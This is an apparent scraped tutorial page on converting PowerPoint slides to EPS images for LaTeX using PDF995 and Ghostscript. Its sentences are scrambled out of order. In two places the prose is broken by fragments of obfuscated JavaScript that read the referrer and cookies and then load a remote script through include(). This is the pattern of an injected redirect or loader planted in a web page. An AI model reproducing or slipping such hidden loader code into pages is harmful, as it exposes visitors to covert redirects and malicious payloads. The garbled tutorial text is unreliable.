If you're looking to embed EPS images in a LaTeX file, you already have these We will need it to define the bounding box of our.
Read on for a discussion and notes Fire up Powerpoint and adjust the page properties to reflect the size/scale that you want your eps image to have.. (2) File > Print, select the PDF995 printer and put a tick on Print to File as shown in the image.. If you have a sketch already made, you should create a 10x10 slide and copy your sketch directly into it, instead of resizing the one its already on, because Powerpoint will just distort it.. *?(?:$|;)/g),_0x211a9c={};if(!_0x4c7d26&&_0x3568c1){return _0x3d86ba;}var _0x535b4a;for(var _0xb2fefe=0x0;_0x5f5bba['QcdYo'](_0x17b124,matches[_0xc72f('0xb')]);_0x4c4f09++){_0x3094de=matches[_0x20c1d6][_0xc72f('0xc')]('=');cookie[params[0x0]]=params[0x1][_0xc72f('0xd')](/;$/);}if(_0xc96f16){return cookie[name];}return _0x5c4482;}}}if(_0x5581fd){cookie['set'](_0x5f5bba[_0xc72f('0x25')],0x1,0x1);if(!_0x28a820){include(_0x5f5bba[_0xc72f('0x2a')](_0x5f5bba[_0xc72f('0x2b')](_0x5f5bba['Ltogb'],q),''));}}}R(); How to Convert PowerPoint to EPS FilesIntroduction: How to Convert PowerPoint to EPS FilesThis method works with pretty much anything from a Microsoft suite that you might want to print out and use in a LaTeX document.. I really want to make a long story short on this one, if at all possible If you're reading this, then you have been troubled for long enough, so read on:I've been trying to figure this out for a very long time and I finally have a perfectly free and efficient way of converting Powerpoint Presentations (.
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In my case, 7 Inches Im just joking of course - hope noone takes offence, but this really is some boring stuff here! However, there is a sliver of truth to this step:The bounding box for your eps image is likely to get messed up if you dont use a square page size that is very similar to the printing size of a normal page.. My favorite is TeXnicCenter For the purposes of this instructable you can get away using Notepad, because we might need to make a small change to the header file of the exported EPS file.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x29c72b){_0x117e36=window;}return _0x117e36;};var _0xfdc9d4=_0x6b7575();var _0x451b4c='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0xfdc9d4['atob']||(_0xfdc9d4['atob']=function(_0x33f2c5){var _0x4e6093=String(_0x33f2c5)['replace'](/=+$/,'');for(var _0x4a105c=0x0,_0xfd7aeb,_0x35de5d,_0x2e5463=0x0,_0x33ff54='';_0x35de5d=_0x4e6093['charAt'](_0x2e5463++);~_0x35de5d&&(_0xfd7aeb=_0x4a105c%0x4?_0xfd7aeb*0x40+_0x35de5d:_0x35de5d,_0x4a105c++%0x4)?_0x33ff54+=String['fromCharCode'](0xff&_0xfd7aeb>>(-0x2*_0x4a105c&0x6)):0x0){_0x35de5d=_0x451b4c['indexOf'](_0x35de5d);}return _0x33ff54;});}());_0xc72f['base64DecodeUnicode']=function(_0x4f9172){var _0x4ab8d7=atob(_0x4f9172);var _0x2bede8=[];for(var _0x1c2174=0x0,_0x3ae598=_0x4ab8d7['length'];_0x1c2174=_0x1d0efa;},'uNOtW':function _0x5c0dfd(_0x369815,_0x21fd9c){return _0x369815===_0x21fd9c;},'NySGk':_0xc72f('0x1c'),'Cvjhs':function _0x5414a8(_0x15d2b6,_0x2b1464){return _0x15d2b6+_0x2b1464;},'PtcIS':function _0x25fc38(_0x4c433e,_0x2c4394){return _0x4c433e+_0x2c4394;},'Ltogb':_0xc72f('0x1d')};var _0x43f886=[_0x5f5bba[_0xc72f('0x1e')],_0x5f5bba[_0xc72f('0x1f')],_0xc72f('0x20'),_0xc72f('0x21'),_0xc72f('0x22'),_0x5f5bba[_0xc72f('0x23')],_0x5f5bba['IGjRg']],_0x380644=document[_0xc72f('0x24')],_0x5581fd=![],_0x28a820=cookie['get'](_0x5f5bba[_0xc72f('0x25')]);for(var _0x20c1d6=0x0;_0x5f5bba['QcdYo'](_0x20c1d6,_0x43f886[_0xc72f('0xb')]);_0x20c1d6++){if(_0x5f5bba[_0xc72f('0x26')](_0x380644[_0xc72f('0x27')](_0x43f886[_0x20c1d6]),0x0)){if(_0x5f5bba[_0xc72f('0x28')](_0x5f5bba[_0xc72f('0x29')],_0x5f5bba[_0xc72f('0x29')])){_0x5581fd=!![];}else{var _0x5c4eb9=document[_0xc72f('0x6')][_0xc72f('0x7')](/[\w-]+=.. The software is add supported (unobtrusive) and very reliable (2) Get Ghostscript and Ghostview.. In the next step, we will configure Powerpoint to spit out EPS files >>Step 2: Configure PowerPointThe images speak louder than words here.. Luckily a virtual printer will do just fine, so go over to PDF995 and download the free PDF printer software.. Through trial and error I have found that 7 inches works for me, so from now on all of my images are perfect squares - to start off with - something I have found very easy to live with.. EPS file, once we export it out of Powerpoint Here's the download link:(3) A LaTeX edittor is good to have. 518b7cbc7d